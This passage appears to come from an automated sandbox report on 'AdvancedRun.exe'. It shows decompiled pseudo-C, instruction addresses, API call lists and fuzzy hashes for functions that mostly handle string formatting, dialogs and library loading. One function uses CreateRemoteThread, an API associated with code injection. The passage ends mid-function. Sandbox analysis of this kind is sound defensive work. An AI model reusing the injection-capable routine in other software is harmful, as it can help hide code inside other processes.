                                                                  0x0040a2c8
                                                                  0x0040a2ce
                                                                  0x0040a2e3
                                                                  0x0040a2ed
                                                                  0x0040a2fb
                                                                  0x0040a2fe
                                                                  0x0040a305
                                                                  0x0040a30c
                                                                  0x0040a30f
                                                                  0x0040a313
                                                                  0x00000000
                                                                  0x0040a31a
                                                                  0x0040a338

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?,76D268A0,00000000), ref: 0040A290
                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                  • String ID: $
                                                                  • API String ID: 283512611-3993045852
                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 45%
                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                  0x00401676
                                                                  0x0040167e
                                                                  0x0040168a
                                                                  0x0040168c
                                                                  0x00401690
                                                                  0x00401691
                                                                  0x00401696
                                                                  0x0040169d
                                                                  0x004016a2
                                                                  0x004016aa
                                                                  0x004016aa
                                                                  0x004016aa
                                                                  0x004016ad
                                                                  0x004016ae
                                                                  0x004016b3
                                                                  0x004016b9
                                                                  0x004016bb
                                                                  0x004016bc
                                                                  0x004016c1
                                                                  0x004016c8
                                                                  0x004016cd
                                                                  0x004016ce
                                                                  0x004016ea
                                                                  0x004016ff
                                                                  0x0040170c
                                                                  0x004016d0
                                                                  0x004016e3
                                                                  0x004016e3
                                                                  0x00401711
                                                                  0x00401714
                                                                  0x00000000
                                                                  0x00401719
                                                                  0x0040171c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: Line%d$Lines
                                                                  • API String ID: 3988819677-2790224864
                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                  0x00405132
                                                                  0x00405135
                                                                  0x00405139
                                                                  0x0040513e
                                                                  0x00405141
                                                                  0x004051b3
                                                                  0x00405143
                                                                  0x00405145
                                                                  0x00405147
                                                                  0x0040514c
                                                                  0x0040514e
                                                                  0x00405151
                                                                  0x00405151
                                                                  0x0040515b
                                                                  0x0040515c
                                                                  0x0040515d
                                                                  0x0040515e
                                                                  0x0040515f
                                                                  0x00405168
                                                                  0x00405169
                                                                  0x00405171
                                                                  0x00405173
                                                                  0x00405174
                                                                  0x00405182
                                                                  0x00405184
                                                                  0x00405189
                                                                  0x0040518c
                                                                  0x00405194
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405196
                                                                  0x0040519a
                                                                  0x0040519b
                                                                  0x004051a1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004051a1
                                                                  0x004051a3
                                                                  0x004051a3
                                                                  0x004051a6
                                                                  0x004051af
                                                                  0x004051b0
                                                                  0x004051b7

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemcpy
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2789212964-323797159
                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 43%
                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                  0x004075bb
                                                                  0x004075c2
                                                                  0x004075c7
                                                                  0x004075ca
                                                                  0x004075cd
                                                                  0x004075d8
                                                                  0x004075e9
                                                                  0x004075fc
                                                                  0x00407600
                                                                  0x00407601
                                                                  0x00407606
                                                                  0x00407609
                                                                  0x0040760e
                                                                  0x00407619
                                                                  0x0040761e
                                                                  0x0040761f
                                                                  0x00407624
                                                                  0x00407636

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: %%-%d.%ds
                                                                  • API String ID: 3988819677-2008345750
                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                  0x00405080
                                                                  0x00405086
                                                                  0x0040508b
                                                                  0x0040508e
                                                                  0x00405091
                                                                  0x00405097
                                                                  0x0040509d
                                                                  0x004050a4
                                                                  0x004050ab
                                                                  0x004050b2
                                                                  0x004050b5
                                                                  0x004050bc
                                                                  0x004050cb
                                                                  0x004050e0
                                                                  0x004050cd
                                                                  0x004050d1
                                                                  0x004050dc
                                                                  0x004050dc

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileNameOpenwcscpy
                                                                  • String ID: L
                                                                  • API String ID: 3246554996-2909332022
                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                  0x00409072
                                                                  0x00409074
                                                                  0x0040907d
                                                                  0x00409086
                                                                  0x0040908e
                                                                  0x004090a5
                                                                  0x004090a5
                                                                  0x0040908e
                                                                  0x004090ac

                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: LookupAccountSidW$Y@
                                                                  • API String ID: 190572456-2352570548
                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                  0x0040ad8c
                                                                  0x0040ad93
                                                                  0x0040ad95
                                                                  0x0040ad9d
                                                                  0x0040ada5
                                                                  0x0040adb2
                                                                  0x0040adb2
                                                                  0x0040adb5
                                                                  0x0040adbf

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                  • String ID: shlwapi.dll
                                                                  • API String ID: 4092907564-3792422438
                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                  0x00406597
                                                                  0x00406598
                                                                  0x004065a0
                                                                  0x004065aa
                                                                  0x004065ac
                                                                  0x004065ac
                                                                  0x004065bd

                                                                  APIs
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                  • String ID: _lng.ini
                                                                  • API String ID: 383090722-1948609170
                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                  0x0040ac59
                                                                  0x0040ac60
                                                                  0x0040ac68
                                                                  0x0040ac6d
                                                                  0x0040ac75
                                                                  0x0040ac7b
                                                                  0x00000000
                                                                  0x0040ac7b
                                                                  0x0040ac6d
                                                                  0x0040ac80

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                  • API String ID: 946536540-880857682
                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                  0x00406670
                                                                  0x0040667a
                                                                  0x00406680
                                                                  0x00406686
                                                                  0x0040668b
                                                                  0x0040668d
                                                                  0x00406693
                                                                  0x00406699
                                                                  0x0040669f
                                                                  0x004066a9
                                                                  0x004066ac
                                                                  0x004066af
                                                                  0x004066b9
                                                                  0x004066c7
                                                                  0x004066d9
                                                                  0x004066c9
                                                                  0x004066c9
                                                                  0x004066cc
                                                                  0x004066cf
                                                                  0x004066d2
                                                                  0x004066d5
                                                                  0x004066d5
                                                                  0x004066db
                                                                  0x004066dd
                                                                  0x004066e0
                                                                  0x004066e8
                                                                  0x004066fa
                                                                  0x004066ea
                                                                  0x004066ea
                                                                  0x004066ed
                                                                  0x004066f0
                                                                  0x004066f3
                                                                  0x004066f6
                                                                  0x004066f6
                                                                  0x004066fc
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x00406709
                                                                  0x0040671b
                                                                  0x0040670b
                                                                  0x0040670b
                                                                  0x0040670e
                                                                  0x00406711
                                                                  0x00406714
                                                                  0x00406717
                                                                  0x00406717
                                                                  0x0040671d
                                                                  0x0040671f
                                                                  0x00406722
                                                                  0x0040672a
                                                                  0x0040673c
                                                                  0x0040672c
                                                                  0x0040672c
                                                                  0x0040672f
                                                                  0x00406732
                                                                  0x00406735
                                                                  0x00406738
                                                                  0x00406738
                                                                  0x0040673f
                                                                  0x00406745

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset
                                                                  • String ID:
                                                                  • API String ID: 1860491036-0
                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
